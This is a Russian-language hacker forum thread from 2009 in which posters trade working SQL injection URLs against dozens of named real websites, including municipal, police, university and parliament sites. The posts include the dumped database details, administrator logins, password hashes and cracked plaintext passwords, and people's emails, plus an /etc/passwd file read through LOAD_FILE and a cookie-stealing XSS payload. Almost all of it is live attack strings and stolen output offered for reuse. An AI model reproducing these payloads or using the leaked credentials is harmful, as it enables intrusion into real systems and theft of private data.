Просмотр полной версии : SQL Инъекции
Pagerank: 5
http://www.saugeenshores.ca/municipal/main.php?PageID=193+and+substring(y(),1,1)=x
y1=version
y2=database
y3=user
x=Version : 3.23.56-Max
Database : saugeenshores
User : saugeendb@localhost
http://www.natinc.us/event-display.php?id=1067/**/UNION/**/SELECT/**/1,2,3,4/**/LIMIT/**/1,1/*
Database Version: 5.0.37
Database name: tenenz
User name: tenendbuser@localhost
есть jos_users
admin:c08bb1867315ff4f6c335163f065284d
load_file
http://www.natinc.us/event-display.php?id=1067/**/UNION/**/SELECT/**/LOAD_FILE(0x2F6574632F706173737764),2,3,4/**/LIMIT/**/1,1/*
ph1l1ster
07.04.2009, 23:35
ardo.ru
тиц 1000
Database Version: 4.1.22
Database name: ardo_ardo
User name: ardo_mysql@194.85.92.172
http://www.ardo.ru/main.php?trid=-1+union+select+1,4,3,4,5,concat(version(),0x3a,use r(),0x3a,database()),7,8,9,10,11,12,13,14,15,16
dvuser.co.uk
Database Version: 4.0.27-standard-log
Database name: db1
User name: dbo136296934@212.227.29.17
http://www.dvuser.co.uk/content.php?CID=99999+union+select+1,2,3,concat(ve rsion(),0x3a,user(),0x3a,database()),5,6,7,8,9,10, 11
www.madinacenter.com
Database Version: 5.0.67-community
Database name: madina_Madina
User name: madina_madina@localhost
http://www.madinacenter.com/post.php?DataID=-1+union+Select+1,2,3,concat(user(),version(),datab ase()),concat(uname,0x3a,upass),6,7+from+users
kvodrat.ru
Database Version: 5.0.67-log
Database name: u61710_kv
User name: u61710@10.10.153.180
http://kvodrat.ru/index.php?note=-1+union+select+1,concat(login,0x3a,pass),concat(us er(),database(),version()),4,5,6,7,8,9,10,11,12,13 ,14,15+from+kv_adminusers
Pagerank: 4
http://www.pumpkinfest.org/news_full.php?NewsID=32+and+substring(y(),1,1)=x
y1=version
y2=database
y3=user
x=Version : 3.23.56-Max
Database : pumpkinfest
User : pumpkindb@localhost
http://more.poetrysociety.org.uk/landmark/display.php?id=-1664/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32/*
Database Version: 5.0.41-log
Database name: poetrysociety
User name: poet@localhost
http://www.montclair.edu/undergraduate_catalog/view_requirements.php?DepartmentID=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+us ers/*
Db: catalog_test
User: dynamic_map@webapp1
Version: 5.0.19-standard-log
========================================
http://www.ischool.utexas.edu/courses/class_details.php?ClassID=-1705'+union+select+1,2,3,4,5,6,user(),version(),9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28/*
User: ischool@localhost
Version: 5.0.45
Db: iSchool
========================================
http://www.fordschool.umich.edu/current/course_description.php?courseid=-1095+union+select+1,2,3,4,5,user(),7,8,9,10,11,12, 13/*
User: fordschool@romanian.web.itd.umich.edu
Version: 5.0.45-log
Dbname: fordschool
Кузовные запчасти для иномарок в Санкт-Петербурге
http://forwardsp.ru/catalog/?car=2871+union+select+1,2,3,4,5,6,7,8,9,0,11,12,1 3,14,15,16,17--
Запчасти для автомобилей иностранного производства со склада в Санкт-Петербурге.
http://avto-import.org/price.php?c=7+and+substring(version(),1,1)=4
<<Северный административный округ "Москва">>
http://beg.sao.mos.ru/news_full.php?id=-18760+union+select+1,unhex(hex(concat_ws(0x3a,vers ion(),database(),user(),@@version_compile_os))),3, 4,5--+
db: 4.1.12
name_db: sao
user: sao@chicken
os: redhat-linux-gnu
http://sibaero.ru/index.php?module=xid&func=viewpub&tid=1&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,concat_ws(0x3a,version(),databas e(),user()),19,20,21,22,23,24/*
Database Version : 4.1.22-log:
Database name : db_sibaero_sibaero
User name : sibaero_sibaero@localhost
-------------------------------------------------------------+
http://www.krani.ru/index.php?ids=-1+union+select+1,2,concat_w s( 0x3a,version(),database(),user()),4,5,6,7--
Database Version : 4.1.22
Database name : krani00
User name : krani00@localhost
-------------------------------------------------------------+
http://www.kubrti.ru/news?id=-24+unIOn+sELeCT+1,2,3,concat_ ws(0x3a,version(),database(),user()),5--
Database Version : 4.0.27-log
Database name : ksvksv99
User name : ksvksv99@v25.valuehost.ru
-------------------------------------------------------------+
http://www.motordetal.com.ua/news/index.php?id_year=-2007+union+select+1,2,concat_ ws(0x3a,version(),database(),user())--
Database Version : 4.1.25-log
Database name : motor
User name : motoradmin@hosting01.iptelecom.net.ua
-------------------------------------------------------------+
http://www.fa13.com/news.html?id=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5--
Database Version : 4.1.10a
Database name : fa13_add
User name : fa13_forum@localhost
<<Департамент Науки и Промышленной Политики города Москвы>>
http://www.dnpp.ru/smi.php?id=-129'+union+select+1,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),3,4,5,6,7,8,9,1 0--+
db: 5.0.67-community-nt
name_db: dnpp
user: duser@localhost
os: Win32
table: _system_users
log: PSS
pass: PsS , помог расшифровать f1ng3r спс ++ :) с меня в следующий пост
status: boss
log: user
pass: user
status: user
.:[melkiy]:.
08.04.2009, 17:55
http://rock.rachelbartonpine.com/rec_cd.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version: 4.1.21-log
Database name: bartonpine2
User name: bartonpine2@localhost
http://www.lokas-ltd.ru/?mod=pr&cat=1&sub=13&id=-1+union+select+1,2,3,4,5,6,7,8.9,10,11,12,13--
Database Version: 5.0.51a-community
Database name: db_lokasltd
User name: okasltd@localhost
Login: admin
Pass: ebd4c4b49a5e8a06d560cf12b0b83407 : ???
http://www.socratiparadoxo.co.za/browser.php?id=-2+union+select+1,2--
Database Version: 5.0.70-log
Database name: www_socratiparadoxo_co_za
User name: socratiparadoxo@localhost
http://www.imcafs.org/coastsheds/index.php?id=-5+union+select+1,2,3,4,6,6,7,8,9--
Database Version: 4.1.22
Database name: imcafs
User name: root@winooski.crc.uri.edu
Login: root
Pass: 18d08208054a0a43 : ???
FILE_PRIV: Y
http://thepro.ph/index.php?vw=news&id=-1+union+select+1,2,3,4--
Database Version: 5.0.67-community-log
Database name: theproph_thepro
User name: theproph_root@localhost
spherics
08.04.2009, 18:33
http://www.visiteabahia.com.br/visite/destinos/costadodende/detalhes.php?id=34443327986557+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19--
Version:5.0.67-community
User: visite_visite@localhost
Database: visite_v1
http://www.djmag.com.br/d.php?id=5587698380987+union+select+1,2,3,4,concat _ws(0x3a,version(),user(),database())--
Version:5.0.51-locaweb-log
User: djmag1@200.234.200.155
Database: djmag1
http://www.editoraideal.com.br/chico_ler_orientacoes.php?id=3333444777766544+unio n+select+1,concat_ws(0x3a,version(),user(),databas e()),3,4,5,6--
Version:5.1.30-community
User: editoraideal2@hm273.locaweb.com.br
Database: editoraideal2
http://www.internetsul.org.br/2008/noticias_detalhes.php?id=366655544433379877+union+ select+1,2,concat_ws(0x3a,version(),user(),databas e()),4,5--
Version:5.0.45
User: internetsul@localhost
Database: internetsul
http://www.daggerbmx.com.br/site/index.php?pagina=galeria&id_galeria=4687687651+union+select+1,concat_ws(0x3 a,version(),user(),database()),3,4,5--&id_imagem=537
Version:5.0.54-log
User: daggerbmx@10.5.3.13
Database: daggerbmx
http://www.pedagogia.com.br/atividade.php?id=5576589769843237+union+select+1,2 ,concat_ws(0x3a,version(),user(),database())--
Version:5.0.51-locaweb-log
User: sobiologia1@200.234.200.88
Database: sobiologia1
http://www.nafigueredo.com.br/cds_int.php?id=5368769870987+union+select+1,2,3,4, 5,concat_ws(0x3a,version(),user(),database()),7,8, 9,10,11,12,13,14,15--
Version:5.0.51a-community
User: n10069_uses@localhost
Database: n10069_uses
http://www.msevangelico.com.br/estudo.php?ID=8098097378098098+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6,7, 8--
Version:5.0.67-community
User: msevange_msevang@localhost
Database: msevange_msevangelico
http://www.pesca.com.br/jan_noticias.php?ID=8098098369879877+union+select+ 1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Vers ion(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71 ),7--
Version:4.1.18-nt-log
Database: pesca
User: sysdba@localhost
http://www.miltonschaefer.com.br/web/ficha.php?id=89097380980987+union+select+1,2,3,4,5 ,concat_ws(0x3a,version(),user(),database()),7,8--
Version:5.0.67-community
User: mschae_root@localhost
Database: mschae_www
http://www.farmaco.ufsc.br/ppgf/view_disc.php?id=66565437987+union+select+concat_w s(0x3a,version(),user(),database()),2,3,4,5,6--
Version: 5.0.45-Max
User: farmaco@localhost
Database: farmaco
.:[melkiy]:.
08.04.2009, 19:47
http://www.romnews.com/community/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 4.0.25-Max-log
Database name: d0056ace
User name: d0056ace@localhost
http://2pb.co.uk/barristers.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67
Database name: 2pb_co_uk_-_2pb
User name: admin2pb@localhost
http://www.swlife.nnov.ru/clients/assortment/72/7399%09union%09select%09version()--
Version 5.0.51a
Есть таблицы swl_users там юзеры сайта но админка похоже не Хтакцессе
Создалели выше указанного сайта
http://www.r52.ru/index.phtml?rid=1&fid=6&sid=13&nid=38911+union+select+1,version(),3,4,5,6,7,8,9,1 0,11,12,13--
Version 5.0.51a
также по хтакцессу похоже
Тиц 3900
если кто-то добьёт то напишите плиз в ЛС
http://www.medicalcare.ru/see.php?id=6+UNION+SELECT+1,2,3,4+LIMIT+1,1/*
Database Version: 4.1.22-lk-log
Database name: medcareru
User name: medcareru@localhost
http://www.laverminepersistante.net/public/see.php?id=0000000012+UNION+SELECT+1,2,3+LIMIT+1,1/*
Database Version: 4.1.15-Debian_0.dotdeb.4
Database name: vermine
User name: vermine@nshweb4
Axodiet.com pr 5
http://www.axodiet.com/eng/boutique/fiche.php?id=-30%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,group_concat(database(),0x23,user(), 0x23,version()),3,4,5,6,7,8,9,0
axodiet#root@localhost#5.0.51a-3ubuntu5.1
http://www.axodiet.com/admin
login,pass: axodietit : peadmin
Достаем пароли от Бд
http://www.axodiet.com/eng/boutique/fiche.php?id=-30%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,group_concat(user,0x23,password),3,4 ,5,6,7,8,9,0%20from%20mysql.user
root *0A624058DAFE7EE13C6F2F64D22793924C063BB9
roundcube *3585AC10E7BD38043158417BB0EAE70734DEEF01
postfix *E4FC6FF842ADEFFC835A1078356EF98FD3D0C855
DrAssault
09.04.2009, 10:04
http://www.hestebasen.com/login/profile.php?id=-747+union+select+1,2,3,4,5,6,7,8,9,10,11,group_con cat(concat_ws(0x3a,username,password,email)+separa tor+0x0a),13,14+from+users/*
http://www.latela.ru/?page=news&newsid=2564567+union+select+1,2,version(),4,5,6--
version 5.0.67-log
Там 5 БД и все похоже какимто машинам посвящены...хотя сайт об одежде
Вообщем кому надо- крутите : )
.:[melkiy]:.
09.04.2009, 15:46
http://www.hempfiles.com/php/page.php?id=-5+UNION+SELECT+1,2,3,4,5,6,7--
Database Version: 5.0.32-Debian_7etch8-log
Database name: hempfiles
User name: hempfiles@localhost
administrator:ibn23jo
schorpioen:atreides
thesedrugs:th3s3drugs
rmontgomery:buydutchseeds
perfectpee:drugtest
Интересные таблицы: users, phpbb_users, phpads_clients
mailbrush
09.04.2009, 17:41
PR 3
http://www.thegreatnorthern.com/eat-drink.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9
dbu-greatnorth@localhost:db-greatnorthern:5.0.27-community-nt
http://www.thegreatnorthern.com/eat-drink.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+tbl_administ rator
Хз колумны.
PR 0 :)
http://www.bardrinks.mobi/drink.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28/*
Pagerank: 3
http://www.portelginsuper8.com/image.php?ImageID=-6+union+select+1,concat_ws(0x3a,version(),database (),useR(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1,12/*
Database Version: 4.1.20
Database name: pesupereight
User name: pe8base@localhost
Os: redhat-linux-gnu
мдя...развели флуд в теме, есть же специальная тема для таких вопросов и ответов. Предвзятое отношение к новичкам? А отношение новичков к форуму???
mailbrush
09.04.2009, 19:39
http://www.bardrinks.mobi/drink.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28/*dbo143364123@74.208.16.158:db143364123:4.0.27-max-log
Pagerank:5
http://www.owensoundpolice.com/newsfull.php?NewsID=-998+union+select+1,2,concat_ws(0x3a,version(),data base(),useR(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12/*
Database Version: 4.1.20
Database name: ospolicebase
User name: policeweb@localhost
Os: redhat-linux-gnu
Для особо "одаренных" юных хакеров neverdie и DrAssault зачем в теме разводит флуд?
.:[melkiy]:.
09.04.2009, 20:42
Официальный сайт украинской группы Quest Pistols
http://questpistols.com/gallery/gallery.php?id=-13+union+select+1,2,3,4--
Database Version: 5.0.77
Database name: questpistols
User name: questpistols@localhost
OS: redhat-linux-gnu
Интересные таблицы: phpbb_users...
<<My Web Times>>
http://mywebtimes.com/archives/ottawa/display.php?id=-366041+union+select+concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),2,3,4,5,6,7,8,9--+
db: 5.0.51a-3ubuntu5.4-log
name_db: archives
user: admin@localhost
os: debian-linux-gnu
mailbrush
09.04.2009, 23:17
http://www.cocktailguiden.com/mobile/drink.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+--+vinadmin@dedic026.shellkonto.se:dricka:5.0.67-log
http://www.ttorchids.net/db/see.php?View=%27View%27&id=-15/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Database Version: 5.0.32-Debian_7etch8-log
Database name: ttorchids
User name: ttorchids@localhost
mailbrush
09.04.2009, 23:34
http://www.droogle.ca/ip/drink.php?id=1+and+null+union+select+concat_ws(0x3 a,user(),database(),version()),2,3,4,5,6,7,8,9/*Droogle_user@localhost:droogle_drinks:4.1.20
Pagerank: 5
http://www.town.southbruce.on.ca/news-full.php?NewsID=-74+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10, 11
Version : 5.1.30
Database :southbruce
User : munwebmaster@web1.stormweb.net
Os : portbld-freebsd7.0
http://www.town.southbruce.on.ca/news-full.php?NewsID=74+UNION+SELECT+1,2,3,4,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x3a,user_name,0x3a,user_pass word),0x71),0x71),6,7,8,9,10,11+FROM+bd_users+LIMI T+x,1
adminboss:3981acfd000395bfdd0d9997f9b226e2
droth:c4bc5c87744518625b9cbbdfcccd7b44
dwood:ea069814bfcf38ca0f8afdfbb6544101
http://www.town.southbruce.on.ca/news-full.php?NewsID=74+UNION+SELECT+1,2,3,4,AES_DECRYP T(AES_ENCRYPT(CONCAT(user_name,0x3a,user_password) ,0x71),0x71),6,7,8,9,10,11+FROM+bd_users_os+LIMIT+ x,1
adminboss:eb0a191797624dd3a48fa681d3061212: master
droth:c4bc5c87744518625b9cbbdfcccd7b44
dwood:ea069814bfcf38ca0f8afdfbb6544101
satana8920
10.04.2009, 09:08
http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
полей для вывода к сожалению не нашел :(
_SEREGA_
10.04.2009, 09:37
скуль:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,3,4--
потом узнаем версию:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,version(),4--
список таблиц:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,table_name,4+from+information_ schema.tables--
Список столбцов:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,COLUMN_NAME,4+from+information _schema.columns--
имя юзера и пароль:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,username,pass+from+users--
ВОТ:
имя - admin ,
пароль - drserver000
2 satana8920
http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=4+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),5,6,7,8,9,1 0,11,12,13+LIMIT+1,1--
Database Version: 5.0.67-log
Database name: u64588
User name: u64588@10.10.223.232
Os : unknown-freebsd6.2
http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=4+UNION+SELECT+1,2,3,concat_ws(0x3a,User_id,Use r_Login_Name,User_Password),5,6,7,8,9,10,11,12,13+ FROM+tbl_Users+LIMIT+1,1--
1:admin:wrucrest
2:tvar:61sz21
3:squo:karina
etc..
http://www.vetlabassoc.com/display.php?id=-7+union+select+1,2,3,version(),5/*
4.0.27-log
вывод в картинке
http://www.howcheng.com/sillystuff/display.php?id=17/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1/*
Database Version: 4.0.27-max-log
Database name: db96095051
User name: dbo96095051@74.208.16.119
satana8920
10.04.2009, 12:18
https://www.mls-law.de/shop/index.php?include=11&id=20+union+select+1,concat(id,0x3a,email,0x3a,adm in,0x3a,address),3+from+user/*
Database Version: 4.0.27-standard-log
Database name: db224505621
User name: dbo224505621@212.227.114.185
че то меня на немецкие шопы потянуло =)
_SEREGA_
10.04.2009, 12:25
1 http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,2,3,4,5--
2 http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,version(),3,4,5--
3 http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,concat_ws(0x20,user,password),3, 4,5+from+mysql.user--
root 3c09b7d551df88a5
это MySQL хэш!
[PR = 6][SQL - 5]
http://lifepeeragesact.parliament.uk/lifePeeragesAct/detail.php?id=164+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38--
[PR = 4][SQL - 5]
http://faroutshirts.com/detail.php?id=289+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15--
[underwater]
10.04.2009, 16:42
http://www.mega-poker.net/comments.php?id=5+and+1=0+union+select+1,2,concat_ ws%280x3a,user_id,0x3a,username,0x3a,user_password %29,4,5,6+from+megaforum.forum_users--
http://speakercitysoftball.com/news.php?type=story&id=-18 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 ,9,10,11,12+from+users--
http://www.sugababes.com/news-detail.php?id=-1+union+all+select+username,user_password,3,4+from +phpbb_users+where+user_id=2
http://www.libross.com/pub/contenido.php?ID=-9999+union+all+select+1,2,3,concat(username,char(5 8),password)+from+users--
=======================
shttp://www.phpstreet.com/winxp.php?id=-1%20union%20all%20select%201,@@version,3%20--
information_schema,phpstreet_data
counter,sp_download,sp_games,sp_gbook,sp_graphic,s p_java_cat,sp_java_list,sp_news
,sp_wallpaper,sp_webindex,sp_winxp,useronline
:::webmaster:spider:support@phpstreet.com,:::PizZa a:spider:,:::น้องออ
ย:spider:,:::แม็กก้า
:spider:,:::google::google@google.com,:::google::g oogle@google.com
=====================
http://www.controlledlabs.com/product_desc.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,concat(id,0x3a,username,0x3a,password),18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6+from+admin--
А вот так вот хранятся бекапы)
http://www.controlledlabs.com/catalog/admin/backups/
======================
http://www.champion-evreux.fr/produit.php?id=-1+union+select+all+1,2,3,4,5,6,7,8,9,10,concat_ws( 0x3a,version(),user(),database()),12,13,14,15,16,1 7,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44--
http://www.boero-france.com/fr/produit.php?id=-1+union+select+all+1,2,3,4,unhex(hex(concat_ws(0x3 a,version(),user(),database()))),6,7,8,9,10,11,12, 13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34--
=======================
http://www.hostinglook.com/directory.php?ax=list&sub=7&cat_id=directory.php?ax=list&sub=7&cat_id=-1%20union%20select%201,2,concat(id,0x3a,name,0x3a, email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20 from%20links--
http://www.tni.org/detail_pub.phtml?&&&know_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,(SELECT+group_concat(user,0x3a,password,0x3a,us erid,0x3a,groupid,0x3a,fullname,0x3a,iv,0x3a,workg roups)+FROM+user),51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68--
http://www.fiercekitten.com/blog/news.php?id=196+and+0=1+union+select+0,1,2,group_c oncat(username,0x3a,password),4,5,6+from+as_users--
http://www.miromar.com/news.php?id=20+and+0=1+union+select+0,group_concat (user_username,0x3a,user_password),2+from+wma_user s--
http://www.rockforlife.org/article.php?id=-10253%20union%20select%201,%20group_concat(user,0x 3a,pass,0x3a,email,0x3a,status,0x3a,lastlogin),3,4 ,5,6,7,8,9,10,11,12,13,14+from+login--
http://www.jumbuck.com/support/default.php?productid=19+and+0=1+union+select+0,1, group_concat(vchusername,0x3a,vchpassword),3,4+fro m+tblAdmin
=========================
http://www.gamer.tm/news.php?id=-1848+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,g roup_concat(blg_username,0x3a,blg_password),14,15
,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+F ROM+staff/*
http://www.ctpetguide.com/profile.php?id=-8/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,usern ame,passw ord),15,16,17+from+users/*
======================
http://www.thenakedtruthproject.org/product.details.php?product_id=82+and+1=0+union+se lect+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9 ,10,11,12
,13,14,15,16,17,18+from+mysql.user--
Небольшая пьеса в трех действиях:
Нумер рас - включаем интернета кусок и заходим на рандомный сайт, например на этот:
http://www.hkdailynews.com.hk/
После недолгих размышлений руки нас привели:
http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,version(),2,3
Смотрим вер: 5.0.51a-3ubuntu5.1
и поражаемся мысли удрученного админа. Занавес. Антракт.
Нумер два - начинается отаке.
http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,concat(user(),0x2f,database(),0x2f,version()),nu ll,3
Где на сцене видим hkdn@ip-10-1-168-192.rev.dyxnet.com/news_database/5.0.51a-3ubuntu5.1
Потом собираем
cxholidays
information_schema
mysql
news_database
test
webcal
Выдергиваем:
admin -- f17b3fd9fac71f025a5787dd6ef1259a (insidepro.com = cxww)
Нумер три - отаке продолжается.
В мускуле:
*EE30ECF7B15114D19DF0460E2573ECC376217E81 / root
news_databeses:
admin / b0baee9d279d34fa1dfd71aadb908c3f (local database = 11111)
И оп-оп
http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,load_file(%27/etc/passwd%27),null,3--
Парам:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin dom:x:1000:1000:Dominie Liang,,,:/home/dom:/bin/bash benny:x:1001:1001:,,,:/home/benny:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false mysql:x:106:114:MySQL Server,,,:/var/lib/mysql:/bin/false smmta:x:107:115:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:108:116:Mail Submission Program,,,:/var/lib/sendmail:/bin/false hong:x:1002:1002:,,,:/home/hong:/bin/bash osd:x:1003:100:osd:/home/osd: ckli:x:1004:1003:,,,:/home/ckli:/bin/bash waihongchan:x:1005:1004:,,,:/home/waihongchan:/bin/bash
Не курите дети тесто, оно тоже хочет жить.
==============================
http://www.atohm.com/kit_rafalev60.php?id_kit=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11 ,concat(login,0x3a,pass),13%20from%20_user--
ATOHM:244303a9c10d7eef7217c6b1448c887a
dklik:e66e0a4754f9e962c3b3f98fbb691128
http://www.omct.org/index.php?id=&lang=eng&articleSet=Documents&articleId=7253+AND+1=0+UNION+SELECT+ALL+1,2,group_ concat(username,0x3a,password),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17%20from%20users--
user:0mct0r2re,omctwww:fa01faFf90
==============================
http://www.singup.org/songbank/song.php?id=90+union+all+select+group_concat(user_ name,0x3a,user_pass,0x3a,user_email),2%20from%20ad min_user--
singup_live,songbank_live
songbank_live:
accompaniment,admin_user,admin_user_group,admin_us er_level,album,cc_links
confidence,establishment,establishment_favs,event, event_type,keystage,menum
usical_element,pagegroup,pages,pdf,related_link,re lated_song,song,song_accompaniment
song_keystage,song_menu,song_musical_element,song_ style,song_writer,song_year_group
song_yeargroup,songban
admin_user:
user_id,user_group_id,user_name,user_pass,user_ema il,user_level_id
singup_live:
agegroups,altformats,boroughs,cdrom08,comments,con tactchannels,dumprecord,emailalerts,emailformat,em ailnational,emailtype,employment,ethnicityid,exper ience,gender,hasdisability,howdidyou,regions,regis tration,role,sectors,themes,title,workarea
Bethan Millett:f89fc89c7fe02e36926c952a2ff13b84:Beth.Mill ett@fabermusic.com,Celi Barberia:d9779869efc20f3cfaa5d1139e27c226:celi.bar beria@singup.org,Gerard Luskin:c49c07d984ac12da7dd384aa30819db7:gerard@pho cuus.co.uk,Henry Horton:b9e28e42fc461436c8068ce96e6b9fc6:henry@phoc uus.co.uk,Uchenna Ngwe:30ee163acd6c624167ab626b26246228:Uchenna.Ngwe @singup.org,Madeleine York:40d00f79d46311a349bcdb06fb56d0f7:Madeleine.Yo rk@fabermusic.com,Delbar Moinian:6b6e6254f9b8610adf340b39166b8bb3:Delbar.Mo inian@fabermusic.com,Baz Chapman:bafb68a4933f45527c516695d65a7eff:baz.chapm an@singup.org,Erin Mell-Taylor:235133a853db99a075249fc83e38d7c6:Erin.Mell-Taylor@singup.org,Diana North:a4a50d83a373dab656c714757d3b9f76:diana.north @fabermusic.com,Henry Bird:b9210054c9858597fab430bc9ef54f64:henry.bird@f abermusic.com
==========================
http://vladenie.ru/search.php?id=382+and+0+union+select+0,1,2,3,4,5,6 ,7,8,9,concat_ws(char(58),user,password),11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.us er+limit+0,1&cl=6&fromp=1&subtype=0
root:0e6b82290c5ebcf5
http://www.pshsoft.net/pshsoft/en/product.php?id=10001/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/LIMIT/**/1,1/*
Database Version: 4.0.27-max-log
Database name: db188349573
User name: dbo188349573@212.227.34.97
есть users
id: password:username ---> 1:Zy$xAC@;:mamu
хто админку найдеть напишите в личку ща впадлу искать
http://www.renome.biz/product.php?id=37&pid=4/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*
Database Version: 4.1.22-standard
Database name: renome_renome
User name: renome_user@localhost
Суши-таун ^^
http://www.sushi-town.ru/?page=catalog&goods=2+and+1=0+union+SELECT+1,2,3,4,5,6,7,8,9,0,1 1,12,13,14,15,16,17,18,19,20,21,22,23+from+user--&num=0
Calcutta
10.04.2009, 20:04
Database Version: 4.1.22-log
http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,concat(user,0x3a,passwor d,0x3a,host),4+from+mysql.user--
http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,login,pass+from+admins--
http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,'<script>alert(document.cookie)</script>',4--
SIXSS
